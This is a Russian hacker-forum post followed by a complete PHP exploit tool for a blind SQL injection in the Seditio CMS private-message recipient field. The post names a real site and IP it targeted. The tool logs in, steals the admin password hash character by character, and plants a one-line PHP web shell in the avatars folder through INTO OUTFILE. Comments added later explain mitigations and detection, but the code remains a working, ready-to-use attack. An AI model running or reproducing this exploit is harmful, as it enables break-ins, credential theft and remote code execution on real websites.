в общем как-то в ирц пеныч кинул линк на снифер, типа понтанулся. снифер http://na-s.ru от webxakep.net. на одном серваке был сайт voxma.ru с seditio. багу нашел быстро, но плоент написал только дня через 3 чтоли. а вохма в это время ушла в даун, так и ничего не сделал. кста выше нолик выкладывал шеллег, но я поздно заметил =\ Code: http://search.live.com/results.aspx?q=ip%3A194.85.89.245&go=&form=QBLH pm.send.inc.php PHP: $touser_src = explode (",", $newpmrecipient); $touser_req = count($touser_src); foreach($touser_src as $k => $i) { $touser_sql[] = "'".trim(sed_import($i, 'D', 'TXT'))."'"; } $touser_sql = implode (',', $touser_sql); $touser_sql = '('.$touser_sql.')'; $sql = sed_sql_query("SELECT user_id, user_name FROM $db_users WHERE user_name IN $touser_sql"); Code: $touser_sql = implode (',', $touser_sql) объединяет в массив имена получателей ПМ, разделенных запятыми. соответственно в скуле пришлось извратиться без использования оных. вытаскиваем хеш: Code: newpmrecipient=1111')+and((select+case+when+ascii(substring((select+user_password+from+sed_users+where+user_id=1)+from+1+for+1))=1+then+1+else+2+end)>111)/*&.... инту аутфайл, если файл прив включен: Code: newpmrecipient=11111')+into+outfile+'/asd/asd/shell.php'+fields+terminated+by+''+optionally+enclosed+by+0xhexshellnopremer/*&... 
<?php
// seditio.121 remote blind sql injection vulnerability
// bug found and exploit write by c411k
// grats all https://forum.antichat.ru
// 12.11.08
//
// Review note (defender's view): this is a proof-of-concept for the recipient
// list handling in Seditio's pm.send.inc.php, where every comma-separated
// recipient name is quoted and concatenated into a "WHERE user_name IN (...)"
// string instead of being bound as a parameter. The PoC drives two things from
// that single string-concatenation flaw:
//   * get_pass(): a boolean-blind oracle — the only signal is whether the
//     "At least one recipient was wrong" message appears in the response;
//   * get_shell(): a SELECT ... INTO OUTFILE write, which only works when the
//     application's MySQL account holds the FILE privilege and the target
//     directory is writable by the database server.
// Mitigations: bind/escape each recipient value (or reject names containing
// quote characters) on the application side; on the database side run the
// web application under an account without FILE and with secure_file_priv
// set, so INTO OUTFILE cannot reach the web root.
// Detection: bursts of POSTs to pm.php?m=send from one session whose
// newpmrecipient value contains a quote followed by a closing parenthesis or
// SQL keywords, and unexpected .php files appearing under datas/avatars/.
//
//error_reporting(0);
// `@` hides warnings for settings that may be unavailable or locked down;
// set_magic_quotes_runtime() no longer exists on PHP 7+, so that call only
// works because it is suppressed.
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);
header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>xeHko_seditio.121</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY { margin="5"; FONT-WEIGHT: normal; COLOR: #B9B9BD; BACKGROUND: #44474F; FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; }
-->
</style>
</head>
<body>
<?php
// Sends one hand-built HTTP/1.1 request over a raw TCP socket to port 80 and
// returns the response as an array of lines (status line, headers and body
// together, as read by fgets).
//   $host    - target host name (also used in the Host header)
//   $patch   - path relative to the host, without leading slash
//   $method  - HTTP verb; the body ($data_gp) is only sent for 'POST'
//   $data_gp - urlencoded body; its byte length is always sent as
//              Content-Length, even for GET
//   $cook1e  - raw Cookie header value
// The request string is also left in the global $send_http.
// Note: fsockopen() failure is not checked — a refused connection leads to
// warnings from fputs()/feof() on a non-resource rather than a clean error.
function sendd($host, $patch, $method, $data_gp, $cook1e)
{
    global $send_http;
    $s = array();
    $url = fsockopen($host, 80);
    // Absolute-form request target (full URL in the request line).
    $send_http = "$method http://$host/$patch HTTP/1.1\r\n";
    $send_http .= "Host: $host\r\n";
    $send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
    $send_http .= "Cookie: $cook1e\r\n";
    $send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
    // Connection: Close makes feof() below terminate once the server is done.
    $send_http .= "Connection: Close\r\n\r\n";
    if ($method === 'POST') {
        $send_http .= $data_gp;
    }
    //print_r($send_http);
    fputs($url, $send_http);
    // Reads at most 1027 bytes per line; longer lines are split across entries.
    while (!feof($url)) $s[] = fgets($url, 1028);
    fclose($url);
    return $s;
}

// Pushes any buffered output to the client so progress is visible while the
// slow character-by-character loop runs, then pauses for $timee microseconds
// (usleep). Does nothing when the output buffer is empty.
function myflush($timee)
{
    if(ob_get_contents()) {
        ob_flush();
        ob_clean();
        flush();
        usleep($timee);
    }
}

// Tries to learn the installation's filesystem path by provoking an error
// page from plug.php?e=search with a malformed PHPSESSID value and scraping
// the "<b>...</b> on" fragment of the message. Returns the path with
// backslashes normalised to '/' and the last 17 characters dropped
// (presumably the script file name part of the reported path — not verifiable
// from here), or nothing (implicit null) when the pattern is absent, e.g.
// when display_errors is off. Defensive takeaway: keeping display_errors
// disabled in production removes this path disclosure.
function get_fullp()
{
    global $p4, $hostname;
    if(preg_match("/a-z, A-Z, 0-9 and \'-,\' in <b>(.*)<\/b> on/", implode(sendd($hostname, $p4.'/plug.php?e=search', 'GET', '', 'PHPSESSID=./[]')), $m)) {
        return str_replace('\\', '/', substr($m['1'], 0, -17));
    }
}

// Builds the INTO OUTFILE payload and posts it as the PM recipient list.
// $razd is the caller-chosen whitespace substitute ('+', '%20' or '/**/');
// $shell must already be a hex literal (the caller sets it to
// '0x' . bin2hex(...)) so it can appear in the statement without quotes;
// $fullp is the absolute file path the database server is asked to write.
// The trailing "/*" comments out the rest of the original query. This step
// fails harmlessly when the MySQL account lacks FILE or the directory is
// not writable by mysqld — which is exactly the configuration to enforce.
function get_shell()
{
    global $p4, $razd, $hostname, $pe4enki, $myname, $x, $shell, $fullp;
    $expl = 'newpmrecipient='.$myname.'\')'.$razd.'into'.$razd.'outfile'.$razd.'\''.$fullp.'\''.$razd.'fields'.$razd.'terminated'.$razd.'by'.$razd.'\'\''.$razd.'optionally'.$razd.'enclosed'.$razd.'by'.$razd.$shell.'/*&newpmtitle=111d1&newpmtext=333ads&x='.$x;
    sendd($hostname, $p4.'/pm.php?m=send&a=send&to=', 'POST', $expl, $pe4enki);
}

// Authenticates as an ordinary registered user (the injection is reachable
// only from the PM send form, so a valid account is required) and scrapes
// the PHPSESSID and SEDITIO cookies from the Set-Cookie headers.
// Returns the combined "PHPSESSID=...; SEDITIO=..." cookie string.
// Note: $pe4enki is never initialised; if no PHPSESSID header is seen the
// function returns trim(null), i.e. an empty string, with no error.
function login($uname, $pass)
{
    global $p4, $hostname;
    $get_cookie = sendd($hostname, $p4.'/users.php?m=auth&a=check', 'POST', 'rusername='.$uname.'&rpassword='.$pass.'&x=GUEST', '');
    foreach ($get_cookie as $value) {
        if (strpos($value, 'Set-Cookie: PHPSESSID=') !== false) {
            $temp = explode(";", $value);
            $pe4enki = strstr($temp[0], 'PHPSESSID');
        }
        if (strpos($value, 'Set-Cookie: SEDITIO=') !== false) {
            $temp = explode(";", $value);
            $pe4enki .= '; '.strstr($temp[0], 'SEDITIO');
            break;
        }
    }
    return trim($pe4enki);
}

// Fetches the PM send form with the logged-in cookies and extracts the value
// of the hidden input named "x" — presumably a per-session form token the
// handler requires (the PoC calls it "o9e6u"); confirm against the target.
// Returns the token, or nothing (implicit null) when the form is not found.
function secret()
{
    global $p4, $hostname, $pe4enki;
    if(preg_match("/<div><input type=\"hidden\" id=\"x\" name=\"x\" value=\"(.*)\" \/><\/div><\/form>/", implode(sendd($hostname, $p4.'/pm.php?m=send&a=send&to=', 'GET', '', $pe4enki)), $m)) {
        return $m['1'];
    }
}

//hash 48-57 97-102
// Recovers the 32-character password hash of user $userid one character at a
// time. The candidate range is the ASCII codes of '0'-'9' (48-57) and
// 'a'-'f' (97-102), i.e. the alphabet of a hex-encoded MD5; the jump
// `if($i == 58) $i = 97;` skips the codes in between. For each position a
// CASE expression yields 1 only when the character matches, so the injected
// condition holds and the "At least one recipient was wrong" message is
// absent from the response — that missing string is the whole oracle.
// Each matched character is echoed immediately and appended to the global
// $result (which nothing else on this page reads). Worst case is
// 32 * 22 requests against pm.php — an easily visible pattern in access logs.
function get_pass()
{
    global $p4, $razd, $hostname, $tbl_user, $userid, $pe4enki, $myname, $x, $result;
    // Positions 1..32 of the hash (SUBSTRING is 1-based).
    for($n = 0; ++$n <= 32;) {
        // Candidate ASCII codes 48..102, with 58..96 skipped below.
        for($i = 47; ++$i <= 102;) {
            if($i == 58) $i = 97;
            $expl = 'newpmrecipient='.$myname.'\')'.$razd.'and((select'.$razd.'case'.$razd.'when'.$razd.'ascii(substring((select'.$razd.'user_password'.$razd.'from'.$razd.$tbl_user.$razd.'where'.$razd.'user_id='.$userid.')'.$razd.'from'.$razd.$n.$razd.'for'.$razd.'1))='.$i.$razd.'then'.$razd.'1'.$razd.'else'.$razd.'2'.$razd.'end)=1)/*&newpmtitle=ru_antichat_by_c411k&newpmtext=o9e6u_gema_privetkakdela_tygdepropal_izvEni&x='.$x;
            // No error text => the guessed character is correct for this position.
            if(!preg_match("/At least one recipient was wrong(.*)/", implode(sendd($hostname, $p4.'/pm.php?m=send&a=send&to=', 'POST', $expl, $pe4enki)))) {
                echo chr($i);
                $result .= chr($i);
                break;
            }
            myflush(500);
        }
    }
}

// Front-end: with no query string, print the parameter form. All values are
// echoed back verbatim into the SQL payloads by the functions above; this
// tool does no validation of its own input.
// The textarea default is the file body that get_shell() would ask the
// database to write — for incident responders, a one-line PHP file of that
// shape under datas/avatars/ is the artefact to look for.
if (!$_GET) {
    echo '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post"> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="get_hash" type="submit" value=" get admin passwd... "><br> <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD"> ¬ hostname, for expamle "antichat.ru" <input style="background-color: #31333B; color: #B9B9BD;" name="path" value="seditio.121"><font color="#B9B9BD"> ¬ path to index seditio <input style="background-color: #31333B; color: #B9B9BD;" name="userid" value="1"><font color="#B9B9BD"> ¬ admin id, default 1 <input style="background-color: #31333B; color: #B9B9BD;" name="myname" value="c411k"><font color="#B9B9BD"> ¬ register user login <input style="background-color: #31333B; color: #B9B9BD;" name="mypwd" value="password"><font color="#B9B9BD"> ¬ register user password <input style="background-color: #31333B; color: #B9B9BD;" name="prefix" value="sed_users"><font color="#B9B9BD"> ¬ name user table (or database.user_table) , default sed_users. 
<input style="background-color: #31333B; color: #B9B9BD;" name="razd" value="+"><font color="#B9B9BD"> ¬ +, %20, /**/ <br> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="get_shell" type="submit" value=" try into outfile "><br> <input style="background-color: #31333B; color: #B9B9BD;" name="fullp" value="/home/www/seditio.121/datas/avatars/out.php"><font color="#B9B9BD"> ¬ full path <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="try_fullp" type="submit" value=" try get full path "> <textarea style="background-color: #31333B; color: #B9B9BD;" name="shell" cols=44 rows=7><?php require($_REQUEST[\'shell\']);?></textarea></form>';
}

// Dispatcher: the form posts back to ?go_fuck; which submit button was
// pressed selects the action. Globals read by the helper functions are
// populated here straight from $_POST.
if (isset($_GET['go_fuck'])) {
    $hostname = $_POST['hostname'];
    $p4 = $_POST['path'];
    $razd = $_POST['razd'];
    $tbl_user = $_POST['prefix'];
    $userid = $_POST['userid'];
    $myname = $_POST['myname'];
    $mypwd = $_POST['mypwd'];
    $fullp = $_POST['fullp'];
    $shell = $_POST['shell'];
    //$result = array('pass' => '', 'salt' => '');
    // Path disclosure probe; the avatars directory is appended as a guess.
    if (isset($_POST['try_fullp'])) echo '<pre>'.get_fullp().'datas/avatars/out.php';
    // Login -> form token -> blind extraction loop.
    if (isset($_POST['get_hash'])) {
        $pe4enki = login($myname, $mypwd);
        echo '<pre>cookies: '.$pe4enki.'<br>';
        myflush(500);
        $x = secret();
        echo 'o9e6u: '.$x.'<br>';
        myflush(500);
        echo '<pre>password hash (md5): ';
        get_pass();
    }
    // Login -> form token -> INTO OUTFILE attempt.
    if (isset($_POST['get_shell'])) {
        $pe4enki = login($myname, $mypwd);
        echo '<pre>cookies: '.$pe4enki.'<br>';
        myflush(500);
        $x = secret();
        echo 'o9e6u: '.$x.'<br>';
        myflush(500);
        // stripslashes() undoes magic_quotes_gpc; the hex literal form lets
        // the file body pass through the statement without any quote character.
        $shell = '0x'.bin2hex(stripslashes(trim($shell)));
        get_shell();
        echo '<pre>check: '.$hostname.'/'.$p4.'/datas/avatars/out.php';
    }
}
?>